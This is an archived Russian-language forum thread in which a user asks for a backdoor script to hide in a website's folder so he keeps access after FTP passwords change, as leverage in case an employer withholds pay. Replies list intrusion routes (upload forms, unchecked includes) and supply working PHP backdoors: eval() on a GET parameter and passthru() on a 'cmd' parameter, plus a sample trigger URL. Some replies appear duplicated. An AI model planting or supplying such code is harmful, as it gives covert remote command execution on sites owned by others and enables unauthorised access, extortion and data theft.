Кто нибудь делал бэкдор? То есть чтобы можно его было запихнуть в папку с сайтом и иметь свой вход не зависимо от того что кто то сменит на хосте пароли ФТП. Подскажите скрипт пожалуйста)
з.ы. а то что то меня с зарплатой динамят....бывают случаи кидков,так чтобы быть готовым.
Полная версия этой страницы: Подскажите где можно найти скрипт бэкдора
Обычно это делается через всякие формы заливки (аватарки, аттачи и тп). При этом загружаемый файл отдается инклудом (есть в мире идиоты...), не снимается хендлер на пхп в апаче (прямой вызов скрипта из браузера). И то и другое надо еще найти, дураков много, но настраивают им обычно умные люди 
Пробуют инклуды, это когда совсем уж лоховской код берет параметр из запроса без проверок, но надо еще найти такой баг.
Чаще всего ломают путем входа от админа, но тоже специфично.
А универсального конечно нет
А если ты про то, чтобы сделать самому бекдор, так если они совсем балбесы в пхп сделай где нить
да и вызови http://sisi.com/index.php?jopa=echo%20phpinfo();
но за такое по лицу могут ударить))
Пробуют инклуды, это когда совсем уж лоховской код берет параметр из запроса без проверок, но надо еще найти такой баг.
Чаще всего ломают путем входа от админа, но тоже специфично.
А универсального конечно нет
А если ты про то, чтобы сделать самому бекдор, так если они совсем балбесы в пхп сделай где нить
if(isset($_GET['jopa'])){
eval($_GET['jopa']);
}
eval($_GET['jopa']);
}
да и вызови http://sisi.com/index.php?jopa=echo%20phpinfo();
но за такое по лицу могут ударить))
ясно)
antonn лучше вот так: <? passthru($_GET[cmd]) ? >
да какая разница, так ты можешь передать любой код который выполнится, в том числе создать новый скрипт к корне в котором будет что тебе угодно
Для просмотра полной версии этой страницы, пожалуйста, пройдите по ссылке.